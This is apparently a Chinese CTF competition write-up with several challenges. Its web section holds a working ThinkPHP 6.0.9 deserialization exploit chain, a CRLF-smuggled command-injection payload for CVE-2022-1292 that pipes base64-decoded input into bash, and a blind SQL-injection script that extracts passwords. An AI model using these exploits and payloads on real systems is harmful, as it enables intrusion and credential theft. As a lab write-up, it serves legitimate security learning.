出题人不会出可以不出

Web手变成Crypto手,密码学大胜利

Web

ezpop

扫目录发现源码www.zip,发现反序列化触发点

Thinkphp6.0.9反序列化复现及整合 - 先知社区 (aliyun.com)

网上的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
<?php

namespace think {

    use think\route\Url;

    abstract class Model
    {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;
        public function __construct()
        {
            $this->lazySave = true;
            $this->withEvent = false;
            $this->exists = true;
            $this->table = new Url();
            $this->force = true;
            $this->data = ["1"];
        }
    }
}

namespace think\model {

    use think\Model;

    class Pivot extends Model
    {
        function __construct()
        {
            parent::__construct();
        }
    }
    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {

    use think\Middleware;
    use think\Validate;

    class Url
    {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;
        public function __construct()
        {
            $this->url = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app = new Middleware();
            $this->route = new Validate();
        }
    }
}

namespace think {

    use think\view\driver\Php;

    class Validate
    {
        public function __construct()
        {
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }
    class Middleware
    {
        public function __construct()
        {
            $this->request = "2333";
        }
    }
}

namespace think\view\driver {
    class Php
    {
        public function __construct()
        {
        }
    }
}

image-20220529203229115

online_crt

下源码,发现openssl,最近有个命令注入的洞CVE-2022-1292

注入点在这

image-20220529163518331

文件名可以从go写的这个重命名的地方修改

image-20220529163550057

要先绕过这两个判断url和host的地方,可以用Python的Proxy路由进行crlf

image-20220529163632506

整体流程如下:

先POST getcrt进行获取crt证书

image-20220529163900483

随后利用crlf绕过判断,进行修改文件名

request.form.get是从post表单中获取值,同时又限制了只能发送get,因此可以构建以下数据包绕过

image-20220529163932986

c.Request.URL.RawPath指的是解码前的URL

image-20220529195553069

payload

1
%2F%2561dmin%2Frename%3Foldname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%26newname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%2522%253Becho%2520Payload%253D%257Cbase64%2520%252Dd%257Cbash%2520%252Di%253Becho%2522%20HTTP%2F1%2E1%0AHost%3A%20admin%0AUser%2DAgent%3A%20admin%0AAccept%2DEncoding%3A%20gzip%2C%20deflate%0AAccept%2DLanguage%3A%20zh%2DCN%2Czh%3Bq%3D0%2E9%0AConnection%3A%20close%0A%0A%0A

最后访问createlink触发

image-20220529164005068

image-20220529164015415

Ezpentest

https://ctfking.com/2022/032432393.html

出题人这是拿waf来让我们猜,恶心人吗这是,放了两次hint,直到黑灯了才有解

过滤了~,因此文章里的payload需要改一下,~0+1+''改成!0+18446744073709551615+1+''也可利用整数溢出进行报错注入

直接拿文章里的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
url='http://xxx/login.php'
proxies = {
	"http":"http://127.0.0.1:8080/"
}
flag=''
for i in range(1,50):
    for ascii in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789^!?$':
        temp=ascii
        if(temp in '^!?$'):
            temp="\\\\\\"+temp
        payload={
            'password':'xxx',
            # "username":f"'||case`username`like'{flag+temp}%'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'",
            "username":f"'||case`password`like'{flag+temp}%'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'",
        }
        response=requests.post(url=url, data=payload,proxies=proxies)
        if response.status_code==500:
            flag+=temp
            print(flag)
            break
        # print(ascii)

密码:(挺怪异一段,忘了存了)

image-20220531195830075

账户不是admin,注一下发现是这么个玩意:

image-20220531195917659

然而还是登录不上,不知道为啥了最后时间不够没去找flag是不是在别的表里,绝了

Crypto

签到电台

拿提示

image-20220529113452440

从题中拿到密码本,根据提示写脚本

1
2
3
4
5
6
7
key="2912 3414 5162 6502 4914 3233 4313".split(" ")
flag="1732 2514 1344 0356 0451 6671 0055".split(" ")
res=""
for i in range(len(key)):
    for j in range(len(key[i])):
       res+=str((int(key[i][j])+int(flag[i][j]))%10)
print(res)

image-20220529113535253

基于挑战码的双向认证1、2

非预期,root目录权限没配置,可以直接读取flag

image-20220529114649647

基于挑战码的双向认证3

依旧是非预期,root的密码是弱口令toor,直接su root

image-20220529200134210

ISO9798

先跑验证码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import hashlib
import string


def sha256(s):  # sha256
    return hashlib.sha256(str(s).encode('utf-8')).hexdigest()

total_sha256 = 'd0320fe0ec98bde37c5ed7f87d7d2624cccc0d87c247e91ca44f00874f06f2c8'
know = 'VN6HjfueM7Uj8q5E'

dic = string.digits + string.ascii_letters

def findsha256(know,total_sha256):    # 输入范围 里面会进行sha256测试
    for i in dic:
        for j in dic:
            for k in dic:
                for l in dic:
                    tmp = i+j+k+l+know
                    print(tmp)
                    if sha256(tmp) == total_sha256:
                        print("success:" + i+j+k+l)
                        exit()

findsha256(know,total_sha256)

第二步是输128bit的随机数

随便输满位数,进入第三步

第三步返回了96位得字符串,

观察加密方式,有三项内容,于是尝试三等分,按照题目要求将第二部分和第一部分拼接

image-20220529202739387